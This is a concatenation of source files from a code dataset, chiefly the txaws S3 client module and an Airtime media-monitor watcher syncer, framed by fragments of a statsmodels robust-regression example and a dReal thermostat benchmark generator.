# results_Huber2 = m2_Huber.fit(cov="H2")
# m3_Huber = RLM(data.endog, data.exog, M=norms.HuberT())
# results_Huber3 = m3_Huber.fit(cov="H3")
##############
### Hampel ###
##############
# m1_Hampel = RLM(data.endog, data.exog, M=norms.Hampel())
# results_Hampel1 = m1_Hampel.fit()
# m2_Hampel = RLM(data.endog, data.exog, M=norms.Hampel())
# results_Hampel2 = m2_Hampel.fit(cov="H2")
# m3_Hampel = RLM(data.endog, data.exog, M=norms.Hampel())
# results_Hampel3 = m3_Hampel.fit(cov="H3")
################
### Bisquare ###
################
# m1_Bisquare = RLM(data.endog, data.exog, M=norms.TukeyBiweight())
# results_Bisquare1 = m1_Bisquare.fit()
# m2_Bisquare = RLM(data.endog, data.exog, M=norms.TukeyBiweight())
# results_Bisquare2 = m2_Bisquare.fit(cov="H2")
# m3_Bisquare = RLM(data.endog, data.exog, M=norms.TukeyBiweight())
# results_Bisquare3 = m3_Bisquare.fit(cov="H3")
##############################################
# Huber's Proposal 2 scaling #
##############################################
################
### Huber'sT ###
################
m1_Huber_H = RLM(data.endog, data.exog, M=norms.HuberT())
results_Huber1_H = m1_Huber_H.fit(scale_est=scale.HuberScale())
# m2_Huber_H
# m3_Huber_H
# m4 = RLM(data.endog, data.exog, M=norms.HuberT())
# results4 = m1.fit(scale_est="Huber")
# m5 = RLM(data.endog, data.exog, M=norms.Hampel())
# results5 = m2.fit(scale_est="Huber")
# m6 = RLM(data.endog, data.exog, M=norms.TukeyBiweight())
# results6 = m3.fit(scale_est="Huber")
# print """Least squares fit
#%s
#Huber Params, t = 2.
#%s
#Ramsay's E Params
#%s
#Andrew's Wave Params
#%s
#Hampel's 17A Function
#%s
#""" % (results_ols.params, results_huber.params, results_ramsaysE.params,
# results_andrewWave.params, results_hampel.params)
| bsd-3-clause | -7,524,098,930,800,713,000 | 36.494135 | 137 | 0.583865 | false |
mithrandi/txaws | txaws/s3/client.py | 1 | 32831 | # Copyright (C) 2008 Tristan Seligmann <[email protected]>
# Copyright (C) 2009 Canonical Ltd
# Copyright (C) 2009 Duncan McGreggor <[email protected]>
# Copyright (C) 2012 New Dream Network (DreamHost)
# Licenced under the txaws licence available at /LICENSE in the txaws source.
"""
Client wrapper for Amazon's Simple Storage Service.
API stability: unstable.
Various API-incompatible changes are planned in order to expose missing
functionality in this wrapper.
"""
from io import BytesIO
import datetime
import mimetypes
import warnings
from operator import itemgetter
from incremental import Version
from twisted.python.deprecate import deprecatedModuleAttribute
from twisted.web.http import datetimeToString
from twisted.web.http_headers import Headers
from twisted.web.client import FileBodyProducer
from twisted.internet import task
import hashlib
from hashlib import sha256
from urllib import urlencode, unquote
from dateutil.parser import parse as parseTime
from txaws.client.base import (
_URLContext, BaseClient, BaseQuery, error_wrapper,
RequestDetails, query,
)
from txaws.s3.acls import AccessControlPolicy
from txaws.s3.model import (
Bucket, BucketItem, BucketListing, ItemOwner, LifecycleConfiguration,
LifecycleConfigurationRule, NotificationConfiguration, RequestPayment,
VersioningConfiguration, WebsiteConfiguration, MultipartInitiationResponse,
MultipartCompletionResponse)
from txaws import _auth_v4
from txaws.s3.exception import S3Error
from txaws.service import AWSServiceEndpoint, REGION_US_EAST_1, S3_ENDPOINT
from txaws.util import XML
def _to_dict(headers):
return {k: vs[0] for (k, vs) in headers.getAllRawHeaders()}
def s3_error_wrapper(error):
error_wrapper(error, S3Error)
class S3Client(BaseClient):
"""A client for S3."""
def __init__(self, creds=None, endpoint=None, query_factory=None,
receiver_factory=None, agent=None, utcnow=None,
cooperator=None):
if query_factory is None:
query_factory = query
self.agent = agent
self.utcnow = utcnow
if cooperator is None:
cooperator = task
self._cooperator = cooperator
super(S3Client, self).__init__(creds, endpoint, query_factory,
receiver_factory=receiver_factory)
def _submit(self, query):
d = query.submit(self.agent, self.receiver_factory, self.utcnow)
d.addErrback(s3_error_wrapper)
return d
def _query_factory(self, details, **kw):
return self.query_factory(credentials=self.creds, details=details, **kw)
def _details(self, **kw):
body = kw.pop("body", None)
body_producer = kw.pop("body_producer", None)
amz_headers = kw.pop("amz_headers", {})
# It makes no sense to specify both. That makes it ambiguous
# what data should make up the request body.
if body is not None and body_producer is not None:
raise ValueError("data and body_producer are mutually exclusive")
# If the body was specified as a string, we can compute a hash
# of it and sign the hash along with the rest. That protects
# against replay attacks with different content.
#
# If the body was specified as a producer, we can't really do
# this. :( The producer may generate large amounts of data
# which we can't hold in memory and it may not be replayable.
# AWS requires the signature in the header so there's no way
# to both hash/sign and avoid buffering everything in memory.
#
# The saving grace is that we'll only issue requests over TLS
# after verifying the AWS certificate and requests with a date
# (included in the signature) more than 15 minutes in the past
# are rejected. :/
if body is not None:
content_sha256 = sha256(body).hexdigest().decode("ascii")
body_producer = FileBodyProducer(BytesIO(body), cooperator=self._cooperator)
elif body_producer is None:
# Just as important is to include the empty content hash
# for all no-body requests.
content_sha256 = sha256(b"").hexdigest().decode("ascii")
else:
# Tell AWS we're not trying to sign the payload.
content_sha256 = None
return RequestDetails(
region=REGION_US_EAST_1,
service=b"s3",
body_producer=body_producer,
amz_headers=amz_headers,
content_sha256=content_sha256,
**kw
)
def _url_context(self, *a, **kw):
return s3_url_context(self.endpoint, *a, **kw)
def _headers(self, content_type):
if content_type is None:
return Headers()
return Headers({u"content-type": [content_type]})
def list_buckets(self):
"""
List all buckets.
Returns a list of all the buckets owned by the authenticated sender of
the request.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(),
)
query = self._query_factory(details)
d = self._submit(query)
d.addCallback(self._parse_list_buckets)
return d
def _parse_list_buckets(self, (response, xml_bytes)):
"""
Parse XML bucket list response.
"""
root = XML(xml_bytes)
buckets = []
for bucket_data in root.find("Buckets"):
name = bucket_data.findtext("Name")
date_text = bucket_data.findtext("CreationDate")
date_time = parseTime(date_text)
bucket = Bucket(name, date_time)
buckets.append(bucket)
return buckets
def create_bucket(self, bucket):
"""
Create a new bucket.
"""
details = self._details(
method=b"PUT",
url_context=self._url_context(bucket=bucket),
)
query = self._query_factory(details)
return self._submit(query)
def delete_bucket(self, bucket):
"""
Delete a bucket.
The bucket must be empty before it can be deleted.
"""
details = self._details(
method=b"DELETE",
url_context=self._url_context(bucket=bucket),
)
query = self._query_factory(details)
return self._submit(query)
def get_bucket(self, bucket, marker=None, max_keys=None):
"""
Get a list of all the objects in a bucket.
@param marker: If given, indicate a position in the overall
results where the results of this call should begin. The
first result is the first object that sorts greater than
this marker.
@type marker: L{bytes} or L{NoneType}
@param max_keys: If given, the maximum number of objects to
return.
@type max_keys: L{int} or L{NoneType}
@return: A L{Deferred} that fires with a L{BucketListing}
describing the result.
@see: U{http://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketGET.html}
"""
args = []
if marker is not None:
args.append(("marker", marker))
if max_keys is not None:
args.append(("max-keys", "%d" % (max_keys,)))
if args:
object_name = "?" + urlencode(args)
else:
object_name = None
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name=object_name),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_get_bucket)
return d
def _parse_get_bucket(self, (response, xml_bytes)):
root = XML(xml_bytes)
name = root.findtext("Name")
prefix = root.findtext("Prefix")
marker = root.findtext("Marker")
max_keys = root.findtext("MaxKeys")
is_truncated = root.findtext("IsTruncated")
contents = []
for content_data in root.findall("Contents"):
key = content_data.findtext("Key")
date_text = content_data.findtext("LastModified")
modification_date = parseTime(date_text)
etag = content_data.findtext("ETag")
size = content_data.findtext("Size")
storage_class = content_data.findtext("StorageClass")
owner_id = content_data.findtext("Owner/ID")
owner_display_name = content_data.findtext("Owner/DisplayName")
owner = ItemOwner(owner_id, owner_display_name)
content_item = BucketItem(key, modification_date, etag, size,
storage_class, owner)
contents.append(content_item)
common_prefixes = []
for prefix_data in root.findall("CommonPrefixes"):
common_prefixes.append(prefix_data.text)
return BucketListing(name, prefix, marker, max_keys, is_truncated,
contents, common_prefixes)
def get_bucket_location(self, bucket):
"""
Get the location (region) of a bucket.
@param bucket: The name of the bucket.
@return: A C{Deferred} that will fire with the bucket's region.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?location"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_bucket_location)
return d
def _parse_bucket_location(self, (response, xml_bytes)):
"""Parse a C{LocationConstraint} XML document."""
root = XML(xml_bytes)
return root.text or ""
def get_bucket_lifecycle(self, bucket):
"""
Get the lifecycle configuration of a bucket.
@param bucket: The name of the bucket.
@return: A C{Deferred} that will fire with the bucket's lifecycle
configuration.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?lifecycle"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_lifecycle_config)
return d
def _parse_lifecycle_config(self, (response, xml_bytes)):
"""Parse a C{LifecycleConfiguration} XML document."""
root = XML(xml_bytes)
rules = []
for content_data in root.findall("Rule"):
id = content_data.findtext("ID")
prefix = content_data.findtext("Prefix")
status = content_data.findtext("Status")
expiration = int(content_data.findtext("Expiration/Days"))
rules.append(
LifecycleConfigurationRule(id, prefix, status, expiration))
return LifecycleConfiguration(rules)
def get_bucket_website_config(self, bucket):
"""
Get the website configuration of a bucket.
@param bucket: The name of the bucket.
@return: A C{Deferred} that will fire with the bucket's website
configuration.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name='?website'),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_website_config)
return d
def _parse_website_config(self, (response, xml_bytes)):
"""Parse a C{WebsiteConfiguration} XML document."""
root = XML(xml_bytes)
index_suffix = root.findtext("IndexDocument/Suffix")
error_key = root.findtext("ErrorDocument/Key")
return WebsiteConfiguration(index_suffix, error_key)
def get_bucket_notification_config(self, bucket):
"""
Get the notification configuration of a bucket.
@param bucket: The name of the bucket.
@return: A C{Deferred} that will request the bucket's notification
configuration.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?notification"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_notification_config)
return d
def _parse_notification_config(self, (response, xml_bytes)):
"""Parse a C{NotificationConfiguration} XML document."""
root = XML(xml_bytes)
topic = root.findtext("TopicConfiguration/Topic")
event = root.findtext("TopicConfiguration/Event")
return NotificationConfiguration(topic, event)
def get_bucket_versioning_config(self, bucket):
"""
Get the versioning configuration of a bucket.
@param bucket: The name of the bucket. @return: A C{Deferred} that
will request the bucket's versioning configuration.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?versioning"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_versioning_config)
return d
def _parse_versioning_config(self, (response, xml_bytes)):
"""Parse a C{VersioningConfiguration} XML document."""
root = XML(xml_bytes)
mfa_delete = root.findtext("MfaDelete")
status = root.findtext("Status")
return VersioningConfiguration(mfa_delete=mfa_delete, status=status)
def get_bucket_acl(self, bucket):
"""
Get the access control policy for a bucket.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?acl"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_acl)
return d
def put_bucket_acl(self, bucket, access_control_policy):
"""
Set access control policy on a bucket.
"""
data = access_control_policy.to_xml()
details = self._details(
method=b"PUT",
url_context=self._url_context(bucket=bucket, object_name=b"?acl"),
body=data,
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_acl)
return d
def _parse_acl(self, (response, xml_bytes)):
"""
Parse an C{AccessControlPolicy} XML document and convert it into an
L{AccessControlPolicy} instance.
"""
return AccessControlPolicy.from_xml(xml_bytes)
def put_object(self, bucket, object_name, data=None, content_type=None,
metadata={}, amz_headers={}, body_producer=None):
"""
Put an object in a bucket.
An existing object with the same name will be replaced.
@param bucket: The name of the bucket.
@param object: The name of the object.
@param data: The data to write.
@param content_type: The type of data being written.
@param metadata: A C{dict} used to build C{x-amz-meta-*} headers.
@param amz_headers: A C{dict} used to build C{x-amz-*} headers.
@return: A C{Deferred} that will fire with the result of request.
"""
details = self._details(
method=b"PUT",
url_context=self._url_context(bucket=bucket, object_name=object_name),
headers=self._headers(content_type),
metadata=metadata,
amz_headers=amz_headers,
body=data,
body_producer=body_producer,
)
d = self._submit(self._query_factory(details))
d.addCallback(itemgetter(1))
return d
def copy_object(self, source_bucket, source_object_name, dest_bucket=None,
dest_object_name=None, metadata={}, amz_headers={}):
"""
Copy an object stored in S3 from a source bucket to a destination
bucket.
@param source_bucket: The S3 bucket to copy the object from.
@param source_object_name: The name of the object to copy.
@param dest_bucket: Optionally, the S3 bucket to copy the object to.
Defaults to C{source_bucket}.
@param dest_object_name: Optionally, the name of the new object.
Defaults to C{source_object_name}.
@param metadata: A C{dict} used to build C{x-amz-meta-*} headers.
@param amz_headers: A C{dict} used to build C{x-amz-*} headers.
@return: A C{Deferred} that will fire with the result of request.
"""
dest_bucket = dest_bucket or source_bucket
dest_object_name = dest_object_name or source_object_name
amz_headers["copy-source"] = "/%s/%s" % (source_bucket,
source_object_name)
details = self._details(
method=b"PUT",
url_context=self._url_context(
bucket=dest_bucket, object_name=dest_object_name,
),
metadata=metadata,
amz_headers=amz_headers,
)
d = self._submit(self._query_factory(details))
return d
def get_object(self, bucket, object_name):
"""
Get an object from a bucket.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name=object_name),
)
d = self._submit(self._query_factory(details))
d.addCallback(itemgetter(1))
return d
def head_object(self, bucket, object_name):
"""
Retrieve object metadata only.
"""
details = self._details(
method=b"HEAD",
url_context=self._url_context(bucket=bucket, object_name=object_name),
)
d = self._submit(self._query_factory(details))
d.addCallback(lambda (response, body): _to_dict(response.responseHeaders))
return d
def delete_object(self, bucket, object_name):
"""
Delete an object from a bucket.
Once deleted, there is no method to restore or undelete an object.
"""
details = self._details(
method=b"DELETE",
url_context=self._url_context(bucket=bucket, object_name=object_name),
)
d = self._submit(self._query_factory(details))
return d
def put_object_acl(self, bucket, object_name, access_control_policy):
"""
Set access control policy on an object.
"""
data = access_control_policy.to_xml()
details = self._details(
method=b"PUT",
url_context=self._url_context(
bucket=bucket, object_name='%s?acl' % (object_name,),
),
body=data,
)
query = self._query_factory(details)
d = self._submit(query)
d.addCallback(self._parse_acl)
return d
def get_object_acl(self, bucket, object_name):
"""
Get the access control policy for an object.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name='%s?acl' % (object_name,)),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_acl)
return d
def put_request_payment(self, bucket, payer):
"""
Set request payment configuration on bucket to payer.
@param bucket: The name of the bucket.
@param payer: The name of the payer.
@return: A C{Deferred} that will fire with the result of the request.
"""
data = RequestPayment(payer).to_xml()
details = self._details(
method=b"PUT",
url_context=self._url_context(bucket=bucket, object_name="?requestPayment"),
body=data,
)
d = self._submit(self._query_factory(details))
return d
def get_request_payment(self, bucket):
"""
Get the request payment configuration on a bucket.
@param bucket: The name of the bucket.
@return: A C{Deferred} that will fire with the name of the payer.
"""
details = self._details(
method=b"GET",
url_context=self._url_context(bucket=bucket, object_name="?requestPayment"),
)
d = self._submit(self._query_factory(details))
d.addCallback(self._parse_get_request_payment)
return d
def _parse_get_request_payment(self, (response, xml_bytes)):
"""
Parse a C{RequestPaymentConfiguration} XML document and extract the
payer.
"""
return RequestPayment.from_xml(xml_bytes).payer
def init_multipart_upload(self, bucket, object_name, content_type=None,
amz_headers={}, metadata={}):
"""
Initiate a multipart upload to a bucket.
@param bucket: The name of the bucket
@param object_name: The object name
@param content_type: The Content-Type for the object
@param metadata: C{dict} containing additional metadata
@param amz_headers: A C{dict} used to build C{x-amz-*} headers.
@return: C{str} upload_id
"""
objectname_plus = '%s?uploads' % object_name
details = self._details(
method=b"POST",
url_context=self._url_context(bucket=bucket, object_name=objectname_plus),
headers=self._headers(content_type),
metadata=metadata,
amz_headers=amz_headers,
)
d = self._submit(self._query_factory(details))
d.addCallback(
lambda (response, body): MultipartInitiationResponse.from_xml(body)
)
return d
def upload_part(self, bucket, object_name, upload_id, part_number,
data=None, content_type=None, metadata={},
body_producer=None):
"""
Upload a part of data corresponding to a multipart upload.
@param bucket: The bucket name
@param object_name: The object name
@param upload_id: The multipart upload id
@param part_number: The part number
@param data: Data (optional, requires body_producer if not specified)
@param content_type: The Content-Type
@param metadata: Additional metadata
@param body_producer: an C{IBodyProducer} (optional, requires data if
not specified)
@return: the C{Deferred} from underlying query.submit() call
"""
parms = 'partNumber=%s&uploadId=%s' % (str(part_number), upload_id)
objectname_plus = '%s?%s' % (object_name, parms)
details = self._details(
method=b"PUT",
url_context=self._url_context(bucket=bucket, object_name=objectname_plus),
headers=self._headers(content_type),
metadata=metadata,
body=data,
)
d = self._submit(self._query_factory(details))
d.addCallback(lambda (response, data): _to_dict(response.responseHeaders))
return d
def complete_multipart_upload(self, bucket, object_name, upload_id,
parts_list, content_type=None, metadata={}):
"""
Complete a multipart upload.
N.B. This can be possibly be a slow operation.
@param bucket: The bucket name
@param object_name: The object name
@param upload_id: The multipart upload id
@param parts_list: A List of all the parts
(2-tuples of part sequence number and etag)
@param content_type: The Content-Type of the object
@param metadata: C{dict} containing additional metadata
@return: a C{Deferred} that fires after request is complete
"""
data = self._build_complete_multipart_upload_xml(parts_list)
objectname_plus = '%s?uploadId=%s' % (object_name, upload_id)
details = self._details(
method=b"POST",
url_context=self._url_context(bucket=bucket, object_name=objectname_plus),
headers=self._headers(content_type),
metadata=metadata,
body=data,
)
d = self._submit(self._query_factory(details))
# TODO - handle error responses
d.addCallback(
lambda (response, body): MultipartCompletionResponse.from_xml(body)
)
return d
def _build_complete_multipart_upload_xml(self, parts_list):
xml = []
parts_list.sort(key=lambda p: int(p[0]))
xml.append('<CompleteMultipartUpload>')
for pt in parts_list:
xml.append('<Part>')
xml.append('<PartNumber>%s</PartNumber>' % pt[0])
xml.append('<ETag>%s</ETag>' % pt[1])
xml.append('</Part>')
xml.append('</CompleteMultipartUpload>')
return '\n'.join(xml)
class Query(BaseQuery):
"""A query for submission to the S3 service."""
def __init__(self, bucket=None, object_name=None, data="",
content_type=None, metadata={}, amz_headers={},
body_producer=None, *args, **kwargs):
super(Query, self).__init__(*args, **kwargs)
# data might be None or "", alas.
if data and body_producer is not None:
raise ValueError("data and body_producer are mutually exclusive.")
self.bucket = bucket
self.object_name = object_name
self.data = data
self.body_producer = body_producer
self.content_type = content_type
self.metadata = metadata
self.amz_headers = amz_headers
self._date = datetimeToString()
if not self.endpoint or not self.endpoint.host:
self.endpoint = AWSServiceEndpoint(S3_ENDPOINT)
self.endpoint.set_method(self.action)
@property
def date(self):
"""
Return the date and emit a deprecation warning.
"""
warnings.warn("txaws.s3.client.Query.date is a deprecated attribute",
DeprecationWarning,
stacklevel=2)
return self._date
@date.setter
def date(self, value):
"""
Set the date.
@param value: The new date for this L{Query}.
@type value: L{str}
"""
self._date = value
def set_content_type(self):
"""
Set the content type based on the file extension used in the object
name.
"""
if self.object_name and not self.content_type:
# XXX nothing is currently done with the encoding... we may
# need to in the future
self.content_type, encoding = mimetypes.guess_type(
self.object_name, strict=False)
def get_headers(self, instant):
"""
Build the list of headers needed in order to perform S3 operations.
"""
headers = {'x-amz-date': _auth_v4.makeAMZDate(instant)}
if self.body_producer is None:
data = self.data
if data is None:
data = b""
headers["x-amz-content-sha256"] = hashlib.sha256(data).hexdigest()
else:
data = None
headers["x-amz-content-sha256"] = b"UNSIGNED-PAYLOAD"
for key, value in self.metadata.iteritems():
headers["x-amz-meta-" + key] = value
for key, value in self.amz_headers.iteritems():
headers["x-amz-" + key] = value
# Before we check if the content type is set, let's see if we can set
# it by guessing the the mimetype.
self.set_content_type()
if self.content_type is not None:
headers["Content-Type"] = self.content_type
if self.creds is not None:
headers["Authorization"] = self.sign(
headers,
data,
s3_url_context(self.endpoint, self.bucket, self.object_name),
instant,
method=self.action)
return headers
def sign(self, headers, data, url_context, instant, method,
region=REGION_US_EAST_1):
"""Sign this query using its built in credentials."""
headers["host"] = url_context.get_encoded_host()
if data is None:
request = _auth_v4._CanonicalRequest.from_request_components(
method=method,
url=url_context.get_encoded_path(),
headers=headers,
headers_to_sign=('host', 'x-amz-date'),
payload_hash=None,
)
else:
request = _auth_v4._CanonicalRequest.from_request_components_and_payload(
method=method,
url=url_context.get_encoded_path(),
headers=headers,
headers_to_sign=('host', 'x-amz-date'),
payload=data,
)
return _auth_v4._make_authorization_header(
region=region,
service="s3",
canonical_request=request,
credentials=self.creds,
instant=instant)
def submit(self, url_context=None, utcnow=datetime.datetime.utcnow):
"""Submit this query.
@return: A deferred from get_page
"""
if not url_context:
url_context = s3_url_context(
self.endpoint, self.bucket, self.object_name)
d = self.get_page(
url_context.get_encoded_url(),
method=self.action,
postdata=self.data or b"",
headers=self.get_headers(utcnow()),
)
return d.addErrback(s3_error_wrapper)
def s3_url_context(service_endpoint, bucket=None, object_name=None):
"""
Create a URL based on the given service endpoint and suitable for
the given bucket or object.
@param service_endpoint: The service endpoint on which to base the
resulting URL.
@type service_endpoint: L{AWSServiceEndpoint}
@param bucket: If given, the name of a bucket to reference.
@type bucket: L{unicode}
@param object_name: If given, the name of an object or object
subresource to reference.
@type object_name: L{unicode}
"""
# Define our own query parser which can handle the consequences of
# `?acl` and such (subresources). At its best, parse_qsl doesn't
# let us differentiate between these and empty values (such as
# `?acl=`).
def p(s):
results = []
args = s.split(u"&")
for a in args:
pieces = a.split(u"=")
if len(pieces) == 1:
results.append((unquote(pieces[0]),))
elif len(pieces) == 2:
results.append(tuple(map(unquote, pieces)))
else:
raise Exception("oh no")
return results
query = []
path = []
if bucket is None:
path.append(u"")
else:
if isinstance(bucket, bytes):
bucket = bucket.decode("utf-8")
path.append(bucket)
if object_name is None:
path.append(u"")
else:
if isinstance(object_name, bytes):
object_name = object_name.decode("utf-8")
if u"?" in object_name:
object_name, query = object_name.split(u"?", 1)
query = p(query)
object_name_components = object_name.split(u"/")
if object_name_components[0] == u"":
object_name_components.pop(0)
if object_name_components:
path.extend(object_name_components)
else:
path.append(u"")
return _S3URLContext(
scheme=service_endpoint.scheme.decode("utf-8"),
host=service_endpoint.get_host().decode("utf-8"),
port=service_endpoint.port,
path=path,
query=query,
)
class _S3URLContext(_URLContext):
# Backwards compatibility layer. For deprecation. s3_url_context
# should just return an _URLContext and application code should
# interact with that interface.
def get_host(self):
return self.get_encoded_host()
def get_path(self):
return self.get_encoded_path()
def get_url(self):
return self.get_encoded_url()
# Backwards compatibility layer. For deprecation.
def URLContext(service_endpoint, bucket=None, object_name=None):
args = (service_endpoint,)
for s in (bucket, object_name):
if s is not None:
args += (s.decode("utf-8"),)
return s3_url_context(*args)
deprecatedModuleAttribute(
Version("txAWS", 0, 3, 0),
"See txaws.s3.client.query",
__name__,
"Query",
)
deprecatedModuleAttribute(
Version("txAWS", 0, 3, 0),
"See txaws.s3.client.s3_url_context",
__name__,
"URLContext",
)
| mit | 3,476,167,274,423,799,300 | 34.880874 | 96 | 0.591788 | false |
sourcefabric/Airtime | python_apps/media-monitor/mm2/media/monitor/watchersyncer.py | 10 | 6311 | # -*- coding: utf-8 -*-
import time
import copy
from handler import ReportHandler
from log import Loggable
from exceptions import BadSongFile
from eventcontractor import EventContractor
from events import EventProxy
from request import ThreadedRequestSync, RequestSync
from ..saas.thread import InstanceInheritingThread, getsig
class TimeoutWatcher(InstanceInheritingThread,Loggable):
"""
The job of this thread is to keep an eye on WatchSyncer and force a
request whenever the requests go over time out
"""
def __init__(self, watcher, timeout=5):
self.logger.info("Created timeout thread...")
super(TimeoutWatcher, self).__init__()
self.watcher = watcher
self.timeout = timeout
def run(self):
# We try to launch a new thread every self.timeout seconds
# so that the people do not have to wait for the queue to fill up
while True:
time.sleep(self.timeout)
# If there is any requests left we launch em. Note that this
# isn't strictly necessary since RequestSync threads already
# chain themselves
if self.watcher.requests_in_queue():
self.logger.info("We have %d requests waiting to be launched" %
self.watcher.requests_left_count())
self.watcher.request_do()
# Same for events, this behaviour is mandatory however.
if self.watcher.events_in_queue():
self.logger.info("We have %d events that are unflushed" %
self.watcher.events_left_count())
self.watcher.flush_events()
class WatchSyncer(ReportHandler,Loggable):
def __init__(self, signal, chunking_number = 100, timeout=15):
self.timeout = float(timeout)
self.chunking_number = int(chunking_number)
self.request_running = False
self.__current_thread = None
self.__requests = []
self.contractor = EventContractor()
self.__reset_queue()
tc = TimeoutWatcher(self, self.timeout)
tc.daemon = True
tc.start()
super(WatchSyncer, self).__init__(signal=getsig(signal))
def handle(self, sender, event):
"""
We implement this abstract method from ReportHandler
"""
if hasattr(event, 'pack'):
# We push this event into queue
self.logger.info("Received event '%s'. Path: '%s'" % \
( event.__class__.__name__,
getattr(event,'path','No path exists') ))
try:
# If there is a strange bug anywhere in the code the next line
# should be a suspect
ev = EventProxy(event)
if self.contractor.register(ev): self.push_queue(ev)
#self.push_queue( event )
except BadSongFile as e:
self.fatal_exception("Received bas song file '%s'" % e.path, e)
except Exception as e: self.unexpected_exception(e)
else:
self.logger.info("Received event that does not implement packing.\
Printing its representation:")
self.logger.info( repr(event) )
def requests_left_count(self):
"""
returns the number of requests left in the queue. requests are
functions that create RequestSync threads
"""
return len(self.__requests)
def events_left_count(self):
"""
Returns the number of events left in the queue to create a request
"""
return len(self.__queue)
def push_queue(self, elem):
"""
Added 'elem' to the event queue and launch a request if we are
over the the chunking number
"""
self.logger.info("Added event into queue")
if self.events_left_count() >= self.chunking_number:
self.push_request()
self.request_do() # Launch the request if nothing is running
self.__queue.append(elem)
def flush_events(self):
"""
Force flush the current events held in the queue
"""
self.logger.info("Force flushing events...")
self.push_request()
self.request_do()
def events_in_queue(self):
"""
returns true if there are events in the queue that haven't been
processed yet
"""
return len(self.__queue) > 0
def requests_in_queue(self):
"""
Returns true if there are any requests in the queue. False otherwise.
"""
return len(self.__requests) > 0
def flag_done(self):
"""
called by request thread when it finishes operating
"""
self.request_running = False
self.__current_thread = None
# This call might not be necessary but we would like to get the
# ball running with the requests as soon as possible
if self.requests_in_queue() > 0: self.request_do()
def request_do(self):
"""
launches a request thread only if one is not running right now
"""
if not self.request_running:
self.request_running = True
self.__requests.pop()()
def push_request(self):
"""
Create a request from the current events in the queue and schedule it
"""
self.logger.info("WatchSyncer : Unleashing request")
# want to do request asyncly and empty the queue
requests = copy.copy(self.__queue)
def launch_request():
# Need shallow copy here
t = ThreadedRequestSync( RequestSync.create_with_api_client(
watcher=self, requests=requests) )
self.__current_thread = t
self.__requests.append(launch_request)
self.__reset_queue()
def __reset_queue(self): self.__queue = []
def __del__(self):
#this destructor is completely untested and it's unclear whether
#it's even doing anything useful. consider removing it
if self.events_in_queue():
self.logger.warn("Terminating with events still in the queue...")
if self.requests_in_queue():
self.logger.warn("Terminating with http requests still pending...")
| agpl-3.0 | -980,464,874,824,078,600 | 37.018072 | 79 | 0.590081 | false |
danbryce/dreal | benchmarks/network/thermostat/thermostat-triple-i-p-sat.py | 2 | 4655 |
from gen import *
##########
# shared #
##########
flow_var[0] = """
(declare-fun tau () Real)
"""
flow_dec[0] = """
(define-ode flow_1 ((= d/dt[tau] 1)))
"""
state_dec[0] = """
(declare-fun time_{0} () Real)
(declare-fun tau_{0}_0 () Real)
(declare-fun tau_{0}_t () Real)
"""
state_val[0] = """
(assert (<= 0 time_{0})) (assert (<= time_{0} 1))
(assert (<= 0 tau_{0}_0)) (assert (<= tau_{0}_0 1))
(assert (<= 0 tau_{0}_t)) (assert (<= tau_{0}_t 1))
"""
cont_cond[0] = ["""
(assert (and (>= tau_{0}_0 0) (<= tau_{0}_0 1)
(>= tau_{0}_t 0) (<= tau_{0}_t 1)
(forall_t 1 [0 time_{0}] (>= tau_{0}_t 0))
(forall_t 2 [0 time_{0}] (<= tau_{0}_t 1))))
(assert (and (= [x1_{0}_t x2_{0}_t x3_{0}_t tau_{0}_t]
(pintegral 0. time_{0}
[x1_{0}_0 x2_{0}_0 x3_{0}_0 tau_{0}_0]
[holder_{1} holder_{2} holder_{3} holder_{4}]))
(connect holder_{4} flow_1)))"""]
jump_cond[0] = ["""
(assert (and (= tau_{0}_t 1) (= tau_{1}_0 0)))"""]
################
# thermostat 1 #
################
flow_var[1] = """
(declare-fun x1 () Real)
"""
flow_dec[1] = """
(define-ode flow_2 ((= d/dt[x1] (* 0.015 (- 100 (+ (* (- 1 0.03) x1) (* 0.01 x2) (* 0.02 x3)))))))
(define-ode flow_3 ((= d/dt[x1] (* -0.015 (+ (* (- 1 0.03) x1) (* 0.01 x2) (* 0.02 x3))))))
"""
state_dec[1] = """
(declare-fun mode_1_{0} () Int)
(declare-fun x1_{0}_0 () Real)
(declare-fun x1_{0}_t () Real)
"""
state_val[1] = """
(assert (<= -20 x1_{0}_0)) (assert (<= x1_{0}_0 100))
(assert (<= -20 x1_{0}_t)) (assert (<= x1_{0}_t 100))
"""
cont_cond[1] = ["""
(assert (or (and (= mode_1_{0} 2) (connect holder_{1} flow_2))
(and (= mode_1_{0} 1) (connect holder_{1} flow_3))))
(assert (not (and (connect holder_{1} flow_2) (connect holder_{1} flow_3))))"""]
jump_cond[1] = ["""
(assert (and (= x1_{1}_0 x1_{0}_t)))
(assert (or (and (<= x1_{0}_t 20) (= mode_1_{1} 2))
(and (> x1_{0}_t 20) (= mode_1_{1} 1))))"""]
################
# thermostat 2 #
################
flow_var[2] = """
(declare-fun x2 () Real)
"""
flow_dec[2] = """
(define-ode flow_4 ((= d/dt[x2] (* 0.045 (- 200 (+ (* (- 1 0.06) x2) (* 0.01 x1) (* 0.05 x3)))))))
(define-ode flow_5 ((= d/dt[x2] (* -0.045 (+ (* (- 1 0.06) x2) (* 0.01 x1) (* 0.05 x3))))))
"""
state_dec[2] = """
(declare-fun mode_2_{0} () Int)
